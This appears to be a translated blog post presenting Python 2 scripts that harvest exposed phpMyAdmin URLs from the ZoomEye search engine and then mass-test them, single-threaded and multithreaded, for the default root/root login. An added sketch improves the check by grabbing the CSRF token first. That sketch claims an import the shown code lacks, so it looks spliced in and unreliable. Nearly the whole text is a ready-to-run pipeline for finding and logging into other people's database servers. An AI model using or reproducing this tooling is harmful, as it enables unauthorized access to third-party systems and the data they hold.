Scraping ZoomEye (钟馗之眼) with Python


To be honest, scraping this site with a Python crawler will give somewhat inaccurate results, but it is good enough for research.
The main reason I wrote this: the two IP extractors I had collected stopped working after ZoomEye's update a few days ago, so I figured I would write my own.
1.
urls_get.py (capture the traffic and fill in your own request headers; I removed my own Cookie from the post)
It collects phpMyAdmin targets; there is still a crawling issue and only 400 URLs were retrieved (not solved yet).
To crawl other targets, change the query in the url parameter.

#!/usr/bin/env python
# coding=utf-8
import requests
import json
import codecs
import time
import sys
import random
reload(sys)
sys.setdefaultencoding('utf-8')

headers = {
	'Host': 'www.zoomeye.org',
	'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
	'Accept': 'application/json, text/plain, */*',
	'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
	'Accept-Encoding': 'gzip, deflate',
	# 'Cookie': '...',  # paste your own ZoomEye cookie here (removed from the post)
}
result = []
print "Start : %s" % time.ctime()
for i in range(1, 100):
	try:
		# change the q= parameter to search for something other than phpMyAdmin
		url = 'https://www.zoomeye.org/search?q=app:"phpMyAdmin"&p=' + str(i)
		r = requests.get(url=url, headers=headers)
		res = json.loads(r.text)
		# each match exposes the target URL under matches[n]["webapp"][0]["url"]
		for x in res["matches"]:
			a = x["webapp"][0]["url"]
			print a
			result.append(a)
	except Exception as e:
		print "page %d failed: %s" % (i, e)
	# random delay between pages to avoid being rate-limited
	time.sleep(random.randint(20, 40))
s = '\n'.join(result)
with codecs.open("phpmyadmin_urls.txt", "w+") as f:
	f.write(s)
print "End : %s" % time.ctime()

 
2.
check_url.py (very simple: it only checks the default credentials root/root)

#!/usr/bin/env python
# coding=utf-8
import requests
import codecs
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

# silence the InsecureRequestWarning triggered by verify=False
requests.packages.urllib3.disable_warnings()

# load the URL list produced by urls_get.py
result = []
with codecs.open('phpmyadmin_urls.txt', 'r') as f:
	for line in f.readlines():
		result.append(line.strip('\n/\r'))

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
payload = {'pma_username': 'root', 'pma_password': 'root'}
for url in result:
	try:
		url = url + "/index.php"
		r = requests.post(url=url, headers=headers, data=payload, verify=False)
		# marker string used to detect a successful login
		if 'phpMyAdmin is more friendly with a' in r.content:
			print "ok:" + url
		else:
			print url
	except Exception as e:
		continue
'''
headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
def get_token(url):
	response=requests.get(url,headers=headers)
url="http://192.168.225.134/phpmyadmin/index.php"
payload = {'pma_username': 'root', 'pma_password': 'root'}
r = requests.post(url=url, headers = headers, data = payload)
#print r.text
if "phpMyAdmin is more friendly with a" in r.text:
	print "ok:"+url
'''
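One caveat with the plain credential POST above: many phpMyAdmin versions expect the hidden CSRF token field from the login page to be sent back along with the credentials, so a bare POST can report false negatives even when root/root would work. The commented-out get_token stub above hints at this. Below is an untested sketch of how that token could be fetched first with BeautifulSoup (already imported in the original script); the hidden input named "token" matches phpMyAdmin's login form, but the function check_default_login and the overall flow are my own assumption, not the post's code.

#!/usr/bin/env python
# coding=utf-8
# Sketch: default-credential check that first grabs the hidden CSRF token
# from the phpMyAdmin login page. Assumes a 4.x-style form with a hidden
# input named "token"; untested and not part of the original post.
import requests
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings()
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}

def check_default_login(base_url, user='root', password='root'):
	s = requests.Session()  # keeps the phpMyAdmin session cookie between requests
	login_url = base_url + "/index.php"
	page = s.get(login_url, headers=headers, verify=False, timeout=10)
	soup = BeautifulSoup(page.content, "html.parser")
	token_input = soup.find("input", {"name": "token"})
	payload = {'pma_username': user, 'pma_password': password}
	if token_input is not None:
		payload['token'] = token_input.get("value", "")
	r = s.post(login_url, headers=headers, data=payload, verify=False, timeout=10)
	# same success marker as check_url.py
	return 'phpMyAdmin is more friendly with a' in r.content

if __name__ == '__main__':
	# the address below is the local test host from the commented-out block above
	print check_default_login("http://192.168.225.134/phpmyadmin")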

 
3.
Multi-threaded version
Reference: https://www.cnblogs.com/huangguifeng/p/7632799.html (the article also outlines a multiprocessing approach)

#!/usr/bin/env python2
# -*- coding=utf-8 -*-
from threading import Thread
from Queue import Queue
import requests
import codecs
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')

# silence the InsecureRequestWarning triggered by verify=False
requests.packages.urllib3.disable_warnings()

class DouBanSpider(Thread):
	# class name kept from the reference article (its example crawls Douban)
	def __init__(self, url, q):
		# call the parent Thread constructor
		super(DouBanSpider, self).__init__()
		self.url = url + "/index.php"
		self.q = q
		self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
		self.payload = {'pma_username': 'root', 'pma_password': 'root'}

	def run(self):
		try:
			r = requests.post(url=self.url, headers=self.headers, data=self.payload, verify=False)
		except Exception as e:
			print "failed: " + self.url
			return
		if 'phpMyAdmin is more friendly with a' in r.content:
			print "ok:" + self.url
			self.q.put(self.url)
		else:
			print self.url

def main():
	# queue used to collect the hits found by the threads
	q = Queue()
	# keep a handle on every thread so they can be joined later
	Thread_list = []
	# load the URL list produced by urls_get.py, then start one thread per URL
	result = []
	with codecs.open('phpmyadmin_urls.txt', 'r') as f:
		for line in f.readlines():
			result.append(line.strip('\n/\r'))
	for url in result:
		p = DouBanSpider(url, q)
		p.start()
		Thread_list.append(p)
	# make the main thread wait for all workers to finish
	for i in Thread_list:
		i.join()
	while not q.empty():
		print "class ok:" + q.get()

if __name__ == "__main__":
	start = time.time()
	main()
	print "[info] elapsed: %.2fs" % (time.time() - start)

 
The test result: not a single target was using the default password.
 
2018.11.1
